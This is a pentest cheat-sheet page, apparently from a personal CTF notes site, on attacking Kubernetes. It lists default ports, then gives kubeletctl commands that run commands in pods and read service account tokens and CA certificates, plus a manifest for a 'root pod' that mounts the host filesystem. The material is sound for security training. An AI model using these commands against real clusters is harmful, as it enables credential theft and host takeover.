Pentest
TryhackmeHackthebox
  • 🐧Linux
    • Lateral Movement
    • PrivilageEsc Linux 👑
  • 🪟Windows
    • Lateral Movement
    • PrivilageEsc Windows 👑
    • Active Directory / SMB
  • ☁️Cloud
    • AWS
    • Docker
    • Azure AD
    • Kubernetes
  • 🛠️Tools
    • File Transfers
    • Shells / Payloads
    • Pivoting / Forwarding
    • Network Enumeration
    • Cracking / Fuzzing / Brute-force
  • 🚐TCP
    • 21 ) FTP
    • 22 ) SSH
    • 25 ) SMTP
    • 53 ) DNS
    • 79 ) Finger
    • 110 ) POP3
    • 143, 993 ) IMAP
    • 389 ) LDAP
    • 443 ) HTTPS
    • 2049 /111 ) NFS /RPC
    • 3128 ) Squid Proxy
    • 3690 ) Subversion
    • 6379 ) Redis
    • 9200 ) Elasticsearch
    • 11211 ) Memcached
    • 24007 & 49152) Gluster
  • 🚎UDP
    • 69 ) TFTP
    • 161 ) SNMP
    • 500, 4500 ) IPsec IKE
    • 623) IPMI
  • 🔟OWASP 10
    • SQLi
    • NoSQLi
    • LFI / XXE
    • Command Injection
    • XSS / HTMLi / (S/C)SRF / SSTI
  • 📚Database
    • Oracle SQL | 1521
    • MSSQL / MYSQL / PSQL
  • 🔗Binary Exploitation
    • Linux
    • Windows
  • 👨‍🚒Red team
    • Reconnaissance
    • Initial Access
    • Persistence Techniques
    • AV Evasion Techniques
  • 🐰Bug Bounty
    • Search Engine
    • Index.html
  • ⌚Links
    • Passwords 1
    • Default Passwords
    • Default passwords 2
  • 🔄Other
    • Git
    • HackerGPT
    • Curl
    • Hints!!
    • Log4j
    • Mobile Sec
    • BookMarks
    • Steganography
    • CMS / Servers / Others
    • Deserialization
    • Tryhackme
  • 🤖Mobile Android Pentest
    • Mobile Sec
    • Drozer
  • Group 1
    • 📦HackTheBox — Writeups
      • 🏴‍☠️HTB - Devvortex
Powered by GitBook
On this page
  1. Cloud

Kubernetes

PreviousAzure ADNextTools

Last updated 2 years ago

00. Basic

  • Default ports

Port Range
Purpose
Used By

6443

Kubernetes API server

All

2379-2380

etcd server client API

kube-apiserver, etcd

10250

Kubelet API

Self, Control plane

10259

kube-scheduler

Self

10257

kube-controller-manager

Self

10250

Kubelet API

Self, Control plane

30000-32767

NodePort Services

All

  • kubectl

## ------------------| Basic Infomations
kubectl --server <IP> get pod
kubectl --server <IP> cluster-info
kubectl --server <IP> get namespaces
kubectl --server <IP> auth can-i --list
kubectl --server <IP> --certificate-authority=ca.crt --token=$(cat token) get pod
  • kubelet []

## ------------------| list all the pods on the node
kubeletctl pods -s <IP>

## ------------------| list all the running pods
kubeletctl runningpods -s <IP>
kubeletctl runningpods -s <IP> | jq -c '.items[].metadata | [.name, .namespace]'
## Check what's not in the kube-system namespace

## ------------------| Execute commands
kubeletctl -s <IP> exec "id" -p <PodName> -c <ContainerName>

## ------------------| Auth to Kubernetes API
# /run/secrets/kubernetes.io/serviceaccount
# /var/run/secrets/kubernetes.io/serviceaccount
# /secrets/kubernetes.io/serviceaccout
kubeletctl -s <IP> exec "ls /run/secrets/kubernetes.io/serviceaccount" -p <PodName> -c <ContainerName>                                           
kubeletctl -s <IP> exec "cat /run/secrets/kubernetes.io/serviceaccount/ca.crt" -p <PodName> -c <ContainerName> | tee ca.crt
kubeletctl -s <IP> exec "cat /run/secrets/kubernetes.io/serviceaccount/token" -p <PodName> -c <ContainerName> | tee token
kubectl --server <IP> --certificate-authority=ca.crt --token=$(cat token) get pod
  • Create root pod

## ------------------| YAML skeleton
apiVersion: v1 
kind: Pod
metadata:
  name: h4rithd
  namespace: default
spec:
  containers:
  - name: h4rithd
    image: nginx:1.14.2 # Use this to get the version: kubectl get pod nginx -o yaml --server <IP>           
    volumeMounts: 
    - mountPath: /mnt
      name: hostfs
  volumes:
  - name: hostfs
    hostPath:  
      path: /
  automountServiceAccountToken: true
  hostNetwork: true
  
## ------------------| Start the pod
kubectl apply -f skeleton.yaml --server <IP>

kubeletctl exec "ls /mnt/" -s <IP> -p h4rithd -c h4rithd
☁️
kubeletctl